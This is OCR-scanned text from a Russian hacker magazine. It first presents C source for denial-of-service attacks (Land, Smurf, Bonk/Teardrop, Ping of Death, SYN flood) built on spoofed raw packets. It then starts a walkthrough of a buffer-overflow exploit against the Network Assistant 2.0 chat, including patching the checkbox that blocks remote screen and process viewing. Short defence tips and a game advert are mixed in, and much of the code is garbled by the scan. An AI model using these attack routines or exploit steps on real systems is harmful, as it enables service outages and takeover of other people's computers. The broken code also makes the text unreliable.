можно пожелать атакуемому компь- 
ютеру спокойной ночи. Ключевой 
фрагмент этой атаки мы не будем 
здесь приводить (слишком боль- 
шой), но настоящие хакеры могут 
найти исходный код программы для 
организации атак, использующих 
SMB, в том числе и под Linux. 


LAND: СДЕЛАЙ САМ 

и Зачем посылать множество зап- 
росов удаленному компьютеру, как 
это происходит при большинстве 
DoS-atak, если он может сделать это 
сам? Итак, превращаем компьютер- 
жертву в камикадзе. Дело в том, что 
TCP/IP позволяет отправлять IP-nake- 
ты от имени любого хоста сети. Таким 
образом, ничто не мешает послать 
жертве |Р-пакет, где в качестве agpe- 
са отправителя будет указан ее 
собственный адрес. Порт получателя 
также должен совпадать с портом 
отправителя. Как ни странно это зву- 


паб Ceo ли 


Suites 
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чит, для некоторых операционных 
систем такой |Р-пакет оказывается 
полной неожиданностью. И компью- 
тер с такой осью пытается послать 
ответ сам себе, в результате чего 
возникает зацикливание. Посмотрим 
на фрагмент кода этой старенькой, 
но веселой атаки. 


// переменные 


* hoste; 


Нег; 


ipheader=(struct ip *) bu 


// ищем х 


hoste = ge v[1]); 
bcopy(hoste->h_addr,&sin.sin_addr,ho 
h_length): 

// переводим номер порта в число 
sin.sin_port = htons(atoi(argv[2])): 
et(AF_INET, SOCK 
ливаем адрес отправителя и 


получателя 
ipheader-»ip_src=sin.sin_a 
ipheader->ip_dst=sin.sin_addr; 
// устанавливаем порт отправителя и 
получателя 
tcpheader->th_sport=sin.sin_port; 
tcpheader->th_dport=sin.sin_port; 
// посылаем пакет 
sendto(sock,buffer,sizeof(struct ip)+size- 
of(struct tcphdr),0 kaddr *) 
&sin,sizeof(struct sockaddr_in); 


В этом отрывке кода мы постарались 
показать самое главное, опустив ме- 
нее важные, на наш взгляд, фрагмен- 


iggig 


Smrf-aTaka в виде простенькой схемы 


ты. Следует обратить особое внима- 
ние на то, как устанавливается ag- 
рес/порт отправителя и получателя: 
они совпадают. 

Существует более продвинутая и 
современная реализация атаки Land - 
La Tierra. Ее исходники также свобосд- 
но распространяются в интернете. 


SMURF: ЗОМБИ 
У ТЕБЯ НА СЛУЖБЕ 

m= Не всякий компьютер получается 
заставить уничтожить себя атакой 
Land: это зависит от оси. Но что если 
отослать ICMP-3anpoc от имени 
компьютера-жертвы, да необычный, а 
широковещательный (broadcast)? Ta- 
кой запрос получат все машины под- 
сети и дружно направят ответ компь- 
ютеру-жертве. 

Приведем одну из реализаций 
Smurf: 


void smurf (int sock, struct sockaddr_in 
sin, u_long dest, int psize) 

{ 

// \P-3aronoBok 

struct iphdr *ip; 

// \CMP-3aronoBoK 

struct | icmp; 

char *p 

packet = izeof(struct iphdr) + 
sizeof(struct icmphdr) + psize); 

ip = (struct iphdr *)packet; 
icmp = (struct icmphdr *) (packet + size- 
of(struct iphdr)); 
memse ket, 0, sizeof(struct iphdr) + 
sizeof(struct icm + psize); 

//rotopu |Р-паке 

ip->tot_len = htons(sizeof(struct iphdr) + 
sizeof(struct icmphdr) + psize): 

ip->ihl = 5; 

ip->version = 4: 

ip->ttl = 255; 

ip->tos = 0; 

ip->frag_off = 0; 

ip->protocol = IPPROTO_ICMP; 

ip->saddr = sin.sin_addr.s_addr; 

ip->daddr = dest; 

ip->check = in_chksum((u_short *)ip, size- 
of(struct iphdr)); 

//готовим ICMP-naket 

icmp->type = 8; 

icmp->code = 0; 
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icmp->checksum = in_chksum((u_short 
*Jicmp, sizeof(struct icmphdr) + psize); 

// посылаем пакет 

sendto(sock, packet, sizeof(struct iphdr) + 
sizeof(struct icmphdr) + psize, 

0, (struct sockaddr *)&sin, sizeof(struct 
sockaddr)); 

free(packet); 

} 


Замечание относительно широкове- 
щательных адресов: для подсети 
208.131.0.0 адрес 208.131.255.255 бу- 
дет широковещательным. Кстати, о 
работе с raw sockets (что и позволяет 
нам отправлять пакеты с произволь- 
ных IP) можно прочесть в статье 
«Препарируем IP», опубликованной в 
«Кодинге» Хакера, web-Bepcus: 
www.xakep,ru/magazine/xa/063/116/l.asp. 


TEARDROP И BONK: 
УНИЧТОЖЕНИЕ ПО КУСОЧКАМ 

и Классика жанра удаленных атак, 
базирующихся на различных уязви- 
мостях в программном обеспечении. 
Эти атаки основаны на том, что неко- 
торые операционные системы непра- 
вильно собирают фрагментирован- 
ные |Р-пакеты. В итоге, операцион- 
ная система затирает часть памяти 
со всеми вытекающими отсюда пос- 
ледствиями. 

Давай напишем программу, реали- 
зующую Bonk-ataky. Для начала on- 
ределим константы и переменные: 


#define FRG_CONST 0х3 
#define PADDING Oxic 
struct udp_pkt 

{ 

struct iphdr ip; 

struct udphdr udp; 
char data[PADDING]; 

} pkt; 


Структура udp_pkt представляет со- 
бой заголовки IP и UDP. Константы мы 
будем использовать при дформирова- 
нии [Р-пакетов (см. ниже). Теперь 
можно написать подпрограмму для 
осуществления атаки. Этой функции 
требуется передать сокет, адрес/порт 
отправителя и получателя. 


void fondle(int sck, u_long src_addr, 
u_long dst_addr, int src_prt, int dst_prt) 
{ 
int bs; 
struct sockaddr_in to; 
// обнуляем заголовок пакета 
memset(&pkt, 0, psize): 
// заполняем IP-3aronoBok 
pkt.ip.version = 4; 
Ир! = 5; 
ip.tot_len = htons(udplen + iplen + 
PADDING); 
ip.id = htons(0x455): 
pkt.ip.ttl = 255; 
ip.protocol = IP_UDP; 
ip.saddr = src_addr; 
pkt.ip.daddr = dst_addr; 
// фрагментированный пакет 
pkt.ip.frag_off = htons(0x2000); 
// заполняем UDP-3aronoBok 
pkt.udp.source = htons(src_prt); 
pkt.udp.dest = htons(dst_prt); 
pkt.udp.len = htons(8 + PADDING); 
// посылаем первый фрагмент 
to.sin_family = АЕ МЕТ; 
to.sin_port = src_prt; 
to.sin_addr.s_addr = dst_addr: 
bs = sendto(sck, &pkt, psize, 0, (struct 
sockaddr *) &to, sizeof(struct sockaddr)); 
// посылаем второй фрагмент 
pkt.ip.frag_off = htons(FRG_CONST + 1); 
pkt.ip.tot_len = htons(iplen + FRG_CONST); 
bs = sendto(sck, &pkt, iplen + FRG_CONST + 
1, 0, (struct sockaddr *) &to, sizeof(struct 
sockaddr)); 
} 


Если послать два фрагмента, KOTO- 
рые при сборке наложатся друг на 
друга, операционная система переза- 
пишет часть памяти. Ну, а чтобы быть 
уверенными в результате, сделаем 
контрольный выстрел, вернее, тысячу 
контрольных выстрелов: запустим эту 
функцию в цикле. 


for (i = 0;1<1000; ++i) 

af 

fondle(spf_sck, src_addr, dst_addr, src_prt, 
dst_prt); 

usleep(10000); 

} 


PING OF DEATH 

п Этой атаке я даже не стал приду- 
мывать свое название: "Ping of Death" 
звучит уже круто, да и реализуется 
несложно. Правда, эта атака старова- 
та. Чтобы реализовать Ping of Death, 
надо послать сильно фрагментиро- 
ванный ICMP пакет размером более 
64 килобайт. Пишем: 


Hifdef REALLY_RAW 
#define FIX(x) htons(x) 
Helse 
#define FIX(x) (x) 
Hendif 
Use 
// готовим ICMP-naket 
icmp->icmp_type = ICMP_ECHO; 
icmp->icmp_code = 0; 
icmp->icmp_cksum = htons(~(ICMP_ECHO << 
8)); 


» 


Для защи- 
ты от атаки 
SMBdie goc- 
таточно 
скачать 
патч с сай- 
та 
Microsoft. 


Чтобы on- 
ределить, 
что на тебе 
испытыва- 
ют атаку 
Smurf, не- 
обходимо 
анализиро- 
вать сете- 
вой трафик. 
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Для совре- 
менных 
операцион- 
ных систем 
атаки Bonk 
и Teardrop 
не страш- 
ны. 


Существует 
множество 
других уда- 
ленных 
атак: DNS 
flooding, 
Ping flood- 
ing, UDP 
bomb и T.g. 


УДАР ИЗ 


АЛЕКА ) 


for (offset = 0; offset < 65536; offset += 
sizeof buf - sizeof *ip)) 


— 


// считаем смещение 
ip->ip_off = FIX(offset >> 3); 


if (offset < 65120) 
ip->ip_off |= FIX(IP_MF); 
else 


ip->ip_len = FIX(418): 
// отправляем пакет 
sendto(s, buf, sizeof buf, 0, (struct sockad- 
dr *)&dst, sizeof dst): 
// корректируем смещение 
if (offset == 0) 
{ 
icmp-ricmp_type = 0; 
icmp->icmp_code = 0; 
icmp->icmp_cksum = 0; 
} 
} 


SYN FLOODING: СМЕРТЕЛЬНОЕ 
РУКОПОЖАТИЕ 

m На десерт осталось самое вкусное 
блюдо - SYN flooding. В отличие от вы- 
шеописанных атак, SYN flooding go- 
вольно универсальна. С помощью 
нее можно забить канал любого сер- 
вера, независимо от его операционки, 
если, конечно, он не настроен очень 
хитрым образом :). Посмотрим, как ра- 
ботает связка TCP/IP в случае входя- 
щего соединения и как это можно ис- 
пользовать для организации DoS-ata- 
ки. Сначала клиентская машина посы- 
лает серверу SYN-nakeT для установ- 
ки связи. Получив запрос на соедине- 
ние, сервер посылает клиенту 
SYN/ACK-nakeT в качестве ответа. Та- 
кой пакет дает клиенту понять, что 
сервер ожидает связи. Затем клиент 
посылает АСК-пакет для подтвержде- 
ния. Это на компьютерном сленге на- 
зывается рукопожатием. Тут есть ма- 
ленькая хитрость: как только серверу 
придет слишком много таких запро- 
сов на соединение, он будет игнори- 
ровать остальные запросы. Цель яс- 
на: надо забить очередь входных сое- 
динений сервера, тогда он перестанет 
реагировать на другие запросы. 

Напишем реализацию этой атаки, 
начав с типов данных и переменных: 


// ТРСЛР заголовок 
struct send_tcp 

{ 

struct iphdr ip; 
struct tcphdr tcp; 

} send_tcp; 


// заголовок 

struct pseudo_header 

{ 

unsigned int source_address; 
unsigned int dest_address; 
unsigned char placeholder; 
unsigned char protocol; 
unsigned short tcp_length; 
struct tcphdr tcp; 

} pseudo_header; 

int i; 
int tcp_socket: 

struct sockaddr_in sin; 
int sinlen; 


Переменные send_tcp и 
pseudo_header понадобятся при nog- 
готовке TCP/IP-naketa. tcp_socket мы 
будем использовать для отправки 
запросов. 

Основная часть программы будет 
выглядеть так (несущественные места 
кода я опустил): 
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Черный пинг смерти, восставший из мертвых 


Ping of De 
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SYN Handing 


Множество червивых компьютеров пытаются облапать стойкий сервер :) 


SYN-Flooding - атака на все времена и 


Оси! 


// формируем [Р-пакет 


ihl = 5; 
version = 4; 
tos = 0; 


send_tc 
send_tc 
send_tc 
send_tc 


ip.protocol = 
ip.check = 0; 
ip.saddr = sou 


// формируем ТСР-пак 


id(); 


PPROTO_TCP; 


rce_addr; 


ip.daddr = dest_addr; 


eT 


send_tcp.tcp.source = getpid(); 


send_tcp.tcp.dest = hto 


ns(dest_port): 


send_tcp.tcp.seq = getpid(); 


send_tcp.tcp.ack_seg = 
tcp.tcp.resl = 0; 
tep.tcp.doff = 5; 
tcp.tcp.fin = 0; 
tcp.tcp.syn = 1; 
tcp.tcp.rst = 0; 
tcp.tcp.psh = 0; 
tcp.tcp.ack = 0; 
tcp.tcp.urg = 0; 
send_tcp.tcp.res2 = 0; 

send_tcp.tcp.window = 
send_tcp.tcp.check = 0: 


[24] 
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0; 


htons(512): 


send_tcp.tcp.urg_ptr = 0; 


// установки sin 


sin.sin_family = AF_INET; 
sin.sin_port = send_tcp.tcp.source; 
sin.sin_addr.s_addr = send_tcp.ip.daddr; 


// открываем сокет 


tcp_socket = socket(AF_INET, SOCK_RAW, 


IPPROTO_RAW); 


for(i = 0; i < numsyns; i++) 


{ 


// устанавливаем изменяемые поля 


send_tcp.tcp.source++: 
send_tcp.ip.id++; 
send_tcp.tcp.seq++; 
send_tcp.tcp.check = 0; 
send_tcp.ip.check = 0; 
// считаем контрольну 


ю сумму р 


send_tcp.ip.check = in_cksum((unsigned 


short *)&send_tcp.ip, 20); 


// устанавливаем поля заголовка 
pseudo_header.source_address = 


send_tcp.ip.saddr; 


Ш www.insecure.org - на этом сайте есть описания и исходники 
довольно большего количества уязвимостей. Все экпслоиты 
отсортированы по осям, что очень облегчает поиск. Является 
вроде как официальным сайтом программы птар. 

Ш www-.securityfocus.com - довольно информативный сайт для 


специалистов по безопасности, правда, на финглише. Новости, 
статьи, тулзы... 
Ш packetstorm.linuxsecurity.com - на этом сайте можно найти 
много полезного как для защиты, так и для тестирования 
безопасности компьютера. 
Ш bugtraq.ru - матерый русскоязычный ресурс для сисадминов и 
специалистов по безопасности. На сайте неплохая библиотека. 


pseudo_header.dest_address = 
send_tcp.ip.daddr; 

pseudo_header.placeholder = 0; 

pseudo_header.protocol = IPPROTO_TCP; 

pseudo_header.tcp_length = htons(20); 

bcopy((char *)&send_tcp.tcp, (char 
*)&pseudo_header.tcp, 20); 

send_tcp.tcp.check = in_cksum((unsigned 
short *)&pseudo_header, 32); 

sinlen = sizeof(sin); 

// посылаем пакет 

sendto(tcp_socket, &send_tcp, 40, 0, 
(struct sockaddr *)&sin, sinlen); 

} 

close(tcp_socket); 


HELKERN: ПАНДЕМИЯ 

п В заключение хочется рассказать 
о черве, который при своем распрост- 
ранении использует бреши в програм- 
мном обеспечении, что служит ярким 
примером использования данного ви- 
да уязвимостей. Интернет-червь 
Helkern (он же Slammer, он же 
Sapphire) за пять дней своей актив- 
ности сумел нанести ущерб около 
миллиарда правильных рублей. Это 
не рекорд, зато по количеству зара- 
женных компьютеров (около 80000 
серверов) и геограсфии своего распро- 
странения он один из лидеров. Такую 
эпидемию, которая прошлась по все- 
му миру, называют пандемией. 


Для своего распространения этот 
червь использует уязвимость в 
Microsoft SQL Server 2000, которая 
позволяет ему копировать и запус- 
кать свой код на других машинах, с 
установленным MS SQL Server. Ko- 
нечно, сыграл свою роль и малень- 
кий размер (всего 376 байт!), и алго- 
ритм распространения. Дело в том, 
что этот червь, попав на компьютер, 
не создает никаких файлов, а прос- 
то через определенные промежутки 
времени посылает свой код на слу- 
чайные адреса. 


КАК НЕ СТАТЬ ЖЕРТВОЙ? 

m= Позволим себе парочку-другую 
банальных советов, которые помогут 
защититься от различного рода атак. 
Вытащи из компьютера модем и сете- 
вуху, если же какое-нибудь из этих 
устройств является встроенным, вос- 
пользуйся паяльником или плоско- 
губцами. Но лучше поставь себе fire- 
wall (нынче почти каждый из них уме- 
ет блокировать все эти атаки автома- 
тически) и антивирус, не забывай их 
обновлять время от времени. Если ты 
поставил себе никсы не для того, что- 
бы они там были :), а для дела, то 
настрой свою ось. И, конечно, будь в 
курсе последних новостей. 


Схема Land-3anpoca 


РТ тит пи ие 


Правильная комплектация 
3 CD или двухслойный DVD 


389 правильный объем 
240 страниц 


Никакого мусора и невнятных тем, 


настоящий геймерский рай 
ТОЛЬКО РС ИГРЫ 


ш АЛЕКСАНДР 
Новый проект от создателей культовой 
игры "Казаки" 


m RICHARD BURNS RALLY 
Самый раллийный симулятор года 


m WARHAMMER 40000 
Апокалипсис далекого будущего. 
Кровавая, но зрелищная стратегия. 


m А также: 
- демо-превью «Карибского Кризиса»; 
- материал о движке «Блицкрига»; 
— рейтинг самых привлекательных 
героинь игровых вселенных; 
— рецензии на лучшие игры; 
И многое другое! 


УЖЕ В ПРОДАЖЕ 
ЕСЛИ ТЫ ГЕЙМЕР - 


4 ЭКСПЛОИТ ДЛЯ СЕТЕВОГО ЧАТА ) 


u, ICQ 274-602-370), vOldemar (vOldemar@mail.ru, ICQ 226-428-062) 


эксплоит для | 
СЕТЕВОГО ЧАТА _ 


ПОИСК И ИСПОЛЬЗОВАНИЕ УЯЗВИМОСТИ В NETWORK ASSISTANT 
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б эксплоитах написано огромное количество теоретических статей. Мы же покажем на конкретном примере, как 
найти и использовать уязвимость в популярном сетевом чате Network Assistant 2.0. 


_4 


ля чего это нам необ- 


ходимо? Во-первых, 


нужно NO возможнос- 


ти больше знать о 
программах, которыми 
пользуешься каждый день, особенно 
если они имеют хоть какое-то отно- 
шение к сети. Во-вторых, эксплоит - 
это специфичный набор байт, кото- 
рый в нужном месте превращается 
из обычных и безобидных данных в 
код, способный завладеть удален- 
ным компьютером и выполнить прак- 
тически любые действия. 


ИССЛЕДОВАНИЕ ПРОТОКОЛА 
NETWORK ASSISTANT С 
ПОМОЩЬЮ СНИФЕРА 

и Перед нами обычный чат для ло- 
кальной сети Network Assistant 2.0, и 
нам во что бы то ни стало нужно най- 
ти в нем дыру, желательно без осо- 
бого напряга :). Начнем с изучения 
протокола жертвы. Это значительно 
упростит нам жизнь и даст общее по- 
нятие о том, как осуществляется об- 
мен данными между удаленными хос- 
тами. Порывшись в настройках прог- 
раммы, мы обнаруживаем закладку 
"Связь", которая снабжает нас сле- 
дующей информацией: обмен данны- 
ми осуществляется по протоколу 
UDP и ТСР через 50138-й и 50139-й 


Устарнывны Beteork болят 3 


порты соответственно, с использова- 
нием широковещательных адресов. 

Начинаем захват. Проходит мину- 
та за минутой, а ни одного пакета 
мы так и не перехватили. В чем де- 
ло? Неужели глючит любимый сни- 
фер? Или в чате никто не пишет? 
Для надежности набиваем строчку 
“Hello, people!!!". Но 50138-й и 
50139-й порты по-прежнему молчат. 
Стоп. Память услужливо подсказы- 
вает, что фаервол обнаруживал ак- 
тивность Network Assistant на со- 
вершенно других портах, а именно 
на 56003-м и 56259-м. 

Путем несложных манипуляций при- 
ходим к выводу, что автор программы 
забыл поменять порядок байт (поля 
заголовков семейства протоколов IP 
должны быть в формате big-endian), 


uct UDPHeader { 


Натравливаем правило-фильтр Ha 
56003-й порт. И - о, чудо! - снифер 
начинает ловить пакеты. Пакетов 
много, очень много. Разберемся! 
Пробуем поискать среди перехвачен- 
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ных пакетов текст из канала “Main” 
чата. Он находится без проблем. 
Беглый анализ подтверждает наше 
скромное предположение о том, что 
Network Assistant передает в сеть 
свои данные без использования ка- 
кого-либо шифрования. Нам это 
только на руку. Для того чтобы ра- 
зобраться в дебрях формата пакета 
самого Network Assistant, использу- 
ем любимый шестнадцатеричный ре- 
дактор. Для начала перехватим нес- 
колько однотипных пакетов. Напри- 
мер, обычный текст из канала "Мат". 
Будем посылать по несколько раз 
одни и те же сообщения, потом се- 
рию сообщений разной длины. Не 
забываем перехватывать сообщения 
и других участников чата. В идеале 
желательно найти себе помощника в 
сети, который бы отсылал нужные 
сообщения, но если все хочется сде- 
лать самому, то можно обойтись эму- 
лятором ПК, например VMware 
Workstation. Когда соберется доста- 
точное количество пакетов, присту- 
паем к их сравнению. Анализируем 
сохраненные пакеты начиная со сме- 
щения Ох2А (байты от 0 go 0x29 вхо- 
gat в Ethernet-, IP- и УОР-заголовки 
пакета, а со смещения Ox2A начина- 
ется тело UDP-naketa, то есть пакет 
Network Assistant). Сначала ищем 
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Рис. 3. Действительные порты Network 
Assistant 


одинаковые байты, а потом разные. 
Сразу бросается в глаза, что байт со 
смещением O всегда равен 0, это 
версия протокола. Для следующих 
версий чата вплоть до 3.2 версия 
протокола равна единице. Далее 
идет 2-байтовое поле, которое отли- 
чается в разных пакетах, но идентич- 
но в одинаковых, очевидно, что и оз- 
начает оно длину пакета в байтах :). 
Затем идет непонятное 4-байтовое 
поле, которое меняется от пакета к 
пакету, что навевает подозрение о 
счетчике (например, для борьбы с 
флудом). Следующий байт всегда ра- 
вен OXOF для пакетов с текстом, это 
тип пакета. Изучаем другие пакеты и 
выделяем следующие типы: ОхО0 - 
вход в канал “Мат”, OxO1 - выход из 
канала “Main”, ОхО2 - всплывающее 
сообщение, OxIE - изменение состоя- 
ния пользователя, OXIF - изменение 
цвета пользователя и т.д. Дальше 
размещаются два Разса!-стринга с 
названием хоста-отправителя и ника 
юзера. За ними идет текущая дата в 
формате double (8 байт). Следующие 
4 байта - цвет пользователя в чате. 
На этом заканчивается заголовок па- 
кета Network Assistant. Остальные 
байты в каждом из пакетов специ- 
фичны для каждого типа. Например, 
уже известный нам пакет ID=OXOF 
(пересылка текста) помимо заголов- 
ка содержит Разса|-стринг с названи- 
ем канала, в который посылается 
текст, а также сам посылаемый текст, 
заканчивающийся символом "\0". 
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Рис. 4. Перехваченный пакет 


ДИЗАССЕМБЛИРУЕМ НАССИ 

m Как известно, дизассемблирова- 
ние - это превращение машинного ко- 
да в код Ассемблера. Мы делаем ди- 
зассемблирование оля того, чтобы по- 
лучить возможность свободно анали- 
зировать код Насси. Самый лучший 
программный дизассемблер - это 
Interactive Disassembler (IDA) 
(www.datarescue.com). Получив ассемб- 
лерный листинг программы, можно в 
спокойной обстановке исследовать 
процедуру, в которой находится пере- 
полняемый буфер. А вот саму процеду- 
ру будем искать с помощью дебагера. 


ДЕБАГАЕМ НАССИ 

m= Внашем деле без дебагера обой- 
тись совершенно невозможно. Его 
первоначальное предназначение бы- 
ло в исправлении программных багов. 
В нашем же случае мы будем исполь- 
зовать дебагер для проверки прото- 
кола Насси, более того, он нам окажет 
просто бесценную помощь в написа- 
нии самого эксплоита. Здесь есть два 
варианта - ЗоН-се: (www.compuware.com/ 
products/driverstudio/softice.htm) и Olly 
Debugger (home.t-online.de/home/Ollydbg). 
Первый может работать как из-под 
ringO, так и из-под ring3, второй же - 
только под ring3. Однако преимущест- 
Bo Olly Debugger заключается в TOM, 
что он выступает как отдельная прог- 
рамма с замечательным СУ-интер- 
рейсом, и мы можем свободно делать 
свою работу помимо того, что еще 
загружен отладчик, а 5оН-се этого 
нас лишает. 

Итак, у исследователей появилась 
возможность изменять память Насси. 
Что нам это дает? В принципе, все что 
угодно. Те, кто использует Network 
Assistant, знают, что в настройках 
есть такие функции, как удаленный 
просмотр процессов, просмотр экрана, 
и многие-многие другие. Как правило, 
пользователи запрещают эти воз- 
можности, и мы не можем удаленно 
посмотреть на экран собеседника. Как 
открыть доступ как к просмотру про- 
цессов, так и к другим сфичам? Надо 
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Рис. 5. Пример программы с CheckBox 


как-то убрать в опциях этот флажок. 
A как же мы это сделаем, ga еще и 
удаленно? Найдем тот самый флажок, 
только в памяти. Вообще проверку 
стандартного CheckBox делают с по- 
мощью специальной АР!-рункции 
IsDlgButtonChecked. Ho Network 
Assistant написан Ha Borland Delphi 7, 
a Delphi использует свои специаль- 
ные функции для проверки состояния 
кнопок. В данном случае это будет 
что-то наподобие СпескВох1.Свескеа, 
которая возвращает значение 1 или 0, 
то есть выбрано или нет. Дизассемб- 
лер не показывает нам этих специаль- 
ных функций, в нем эта функция выг- 
лядит примерно так: Call хххххххх, где 
хххххххх - ее адрес. Что же делать? 
Хитрые программеры, которые зада- 
лись этим вопросом задолго до нас, 
изобрели специальную утилиту, кото- 
рая называется Decompiler Delphi, или 
DeDe (ими. Чайхег.ср.ле’). DeDe показы- 
вает не «са! хххххххх», а название 
функции Delphi. Конечно, такой прог- 
раммы, как полноценный декомпиля- 
тор Delphi-Koga, не существует. DeDe 
так назвали потому, что она проводит 
анализ и выдает ассемблерный код с 
комментариями на функции, то есть 
ставит комментарии, если эта функция 
принадлежит Delphi. Давай сделаем 
простенькую программку с CheckBox и 
кнопкой. Кнопка нужна только для 
проверки, работает ли CheckBox. 

Скармливаем полученную програм- 
му в DeDe, после чего получаем вы- 
ходной файл Unitl.pas. Так как прог- 
рамма маленькая, то смотреть там 
почти не на что, и вот что мы видим 
(см. рис. 6): 

ТРогп.СпескВох1: TCheckBox - это 
название и класс нашего CheckBox, 
TCheckBox.GetChecked - функция, ко- 
торая берет значение сфлажка и возв- 
ращает значение на выходе. Mocneg- 
ние две строчки кода - это проверка if 
- then. Вот примерно такой код нам и 
нужно найти. Делаем ту же операцию 
с Насси. DeDe выплевывает нам кучу 
непонятных файлов с расширением 
*.раз. Посмотрим, что там за названия. 
Setup.pas - то, что надо. Так называет- 
ся раздел меню, где находятся наст- 
ройки. Теперь ищем строку 
GetChecked. После длительных поис- 
ков мы пришли к выводу, что назва- 
ние нашего CheckBox - 
TSetupForm.CB2xX, где Х принимает 
значения от O до 6, то есть всего су- 
ществует семь CheckBox. 

В листинге можно видеть, как вызы- 
вают функцию взятия Cpnara 
TCheckBox.GetChecked и результат кла- 
дут в некую переменную. Здесь как раз 
и начинается самое интересное. Если 
возвращать не результат, а ноль, то 


Более де- 
тальную 
информа- 
цию ищи в 
Microsoft 
Knowledge 
Base Article 
- 102025 
(support.mic 
rosoft.com/ 
default.aspx 
?scid=kb;en- 
us;102025). 
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Замеча- 
тельная 
статья о 
том, как 
стать неви- 
димым под 
Windows 
NT, Haxo- 
дится по 
адресу 
www.wasm.r 
u/article.php 
?article=hidi 
ngnt. 
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Puc. 6. Код программы после обработки DeDe 
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Рис. 7. Установка флага в переменную 


Network Assistant будет думать, что 
CheckBox не выбран. Визуально нет ни- 
каких изменений, когда мы его выбира- 
ем - он выбран, а когда снимаем срла- 
KOK - он снимается. Но этот финт будет 
работать, только если мы зайдем в ме- 
ню Setup. А требуется, чтобы это рабо- 
тало всегда, когда есть такое желание 
>). Пожалуй, надо полюбопытствовать, а 
где же проверяют этот сфлаг, когда мы 
нажимаем на кнопку просмотра списка 
процессов. Тут нам понадобится отлад- 
чик. Загружаем программу в отладчик 
по нажатию клавиш <Ctrl>+<G>. Перехо- 
gum по адресу OO4A98BA (см. рисунок 
7) и ставим брейкпоинт на этот адрес. 
По <F9> запускаем программу, входим в 
Setup и сразу, без всяких изменений, 
жмем ОК. В отладчике активируется 
брейкпоинт. Нажимаем <Ctri>+<G> в окне 
памяти программы и выбираем в ре- 
гистр EDX. Теперь мы находимся по ag- 
ресу переменной (004СВ558), в кото- 
рую помещают результат (см. рисунок 
8). Адрес может отличаться в различ- 
ных версиях Windows. Как показано Ha 
рис. 8, вызываем контекстное меню и 
ставим брейк на доступ к памяти, то 
есть - на чтение/запись. Трассируем 
программу дальше. 

Сразу же выползает тетя Оля и со- 
общает, что попалась-таки прове- 


Рис. 8. Установка брейкпоинта на доступ к памяти 
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рочка cpnara. В этом месте мы и бу- 
дем возвращать при любых услови- 
ях O (см. рисунок 5). Для Network 
Assistant это - сброшенный сфлаг, то 
есть удаленный доступ будет разре- 
шен. Аналогичным способом ищем и 
меняем другие флаги. 


ПОИСК ДЫРЫ В NETWORK 
ASSISTANT 

m= Структура пакетов Network 
Assistant нам уже известна. Попробу- 
ем из имеющейся информации вы- 
жать максимум. Для нас особый инте- 
рес представляют всевозможные мас- 
сивы и стринги (кстати, перестань 
каждый раз улыбаться при слове 
«стринги» - мы люди старой закалки и 
употребляем это слово в исключи- 
тельно компьютерном смысле :)). Пер- 
вое, что бросается в глаза, - это 
стринги с названием хоста-отправите- 
ля и ником пользователя. Попробуем 
софрормировать и отправить пакет с 
максимально возможной длиной 
стринга (равной 255). 

Отправив пакет с названием хоста- 
отправителя длиной в 255 байт, полу- 
чаем аварийное завершение програм- 
мы. Переполнение найдено! К сожале- 
нию, показать скриншот не представ- 
ляется возможным - Network Assistant 


слетает намертво без единого писка. 
Объяснение этому явлению очень 
простое - программа написана на 
Delphi, а сие творение гениальной Бор- 
ланд очень любит размещать в стеке 
(сразу за адресом возврата из проце- 
дуры) фрейм SEH (структурная обра- 
ботка исключений). Таким образом, мы 
не только поменяли адрес возврата 
процедуры-обработчика поступивших 
пакетов, нарушив нормальный ход вы- 
полнения программы, но и с успехом 
завалили цепочку обработчиков SEH. 
С этим последним ударом Network 
Assistant уже не в силах справиться. 
Узнать точный размер переполняемо- 
го буфера и другие важные нюансы 
методом тыка не удастся, поэтому да- 
лее полагаемся на дебагер. 


ИССЛЕДОВАНИЕ NETWORK 
ASSISTANT ИЗНУТРИ 

m Итак, перед нами находится гото- 
вая к принятию специальным обра- 
зом сформированного пакета уязви- 
мая к переполнению процедура-обра- 
ботчик поступивших пакетов (нахо- 
дится по адресу OxO004BB938; ее мож- 
но найти, поставив брейк на API- 
функцию recvfrom). Не будем расска- 
зывать, каким образом мы обнаружи- 
ли ограничения в ней. Немного сфан- 
тазии, немного опыта, и дело в шляпе. 
Суть ограничений сводится к тому, 
что чужой код работает по заранее 
оговоренному автором плану, и он не 
приспособлен к тому, чтобы принять 
наш неправильный пакет, да еще и 
корректно его обработать. Первое, 
что мы нарушаем, переполняя стек, - 
затираем большую часть локальных 
переменных уязвимой процедуры, но 
совсем не сракт, что такая огромней- 
шая процедура, как парсер пакетов, 
использует все локальные перемен- 
ные. Не знаю, почему нам так понра- 
вился пакет с ID=OxOF, но, изучив код 
процедуры, мы пришли к выводу, что 
та часть процедуры, которая отвечает 
за обработку пакета OXxOF, НЕ ИС- 
ПОЛЬЗУЕТ локальных переменных, 
затертых в процессе срыва стека. Что 
у нас есть? 16-байтовый массив под 
название хоста (dword ptr EBP-80h), 
именно его мы и будем переполнять. 
Суть переполнения сводится к тому, 
что запись названия хоста из полу- 
ченного пакета в этот массив произ- 
водится без проверки длины. Авторы 
программы наивно полагались на то, 
что длина названия хоста не может 
превышать 15 символов. Также нам 
очень повезло, что копирование 
стрингов производится не с помощью 
строковых функций, а посредством 
старой доброй СоруМетогу. Этот 


Рис. 9. Ставим результат проверки “ноль” 
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Puc. 10. Пакет, вызывающий переполнение 
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Первое, что мы нарушаем, переполняя 
стек, - затираем большую часть локальных 
переменных уязвимой процедуры. 


факт избавляет нас от огромнейшей 
головной боли - не придется форми- 
ровать стринг-эксплоит (в нем нельзя 
использовать управляющие символы, 
и, самое главное, символ ‘\O', так как 
ни одна строковая функция не обра- 
батывает символы, находящиеся пос- 
ле ‘\O'). Другими словами, мы форми- 
руем обычный пакет для Network 
Assistant и записываем в него данные 
в том виде, в каком они есть. Это зна- 
чительно упростит как написание 
эксплоита, так и его код, избавляя нас 
от необходимости внедрения в 
эксплоит декодера. Для того чтобы 
дотянуться gO адреса возврата в сте- 
ке, нам придется записать в перепол- 
няемый массив 80h байт (от греха по- 
дальше будем записывать исключи- 
тельно нули, так как анализ процеду- 
ры показал, что все локальные пере- 
менные инициализируются нулями, и, 
наверное, где-то алгоритм на это по- 
лагается, но нам нет нужды проверять 
сие предположение) плюс еще 4 бай- 
та (в стеке сохраняется старое значе- 
ние регистра ЕВР). Дальше следуют 
три аргумента функции. А за ними мы 
разместим прыжок на следующую 
часть эксплоита. Почему так сложно? 
По-другому нельзя, так как перепол- 
няемый буфер слишком короткий, 
чтобы разместить в нем весь код це- 
ликом. Проблема в том, что хотя в эти 
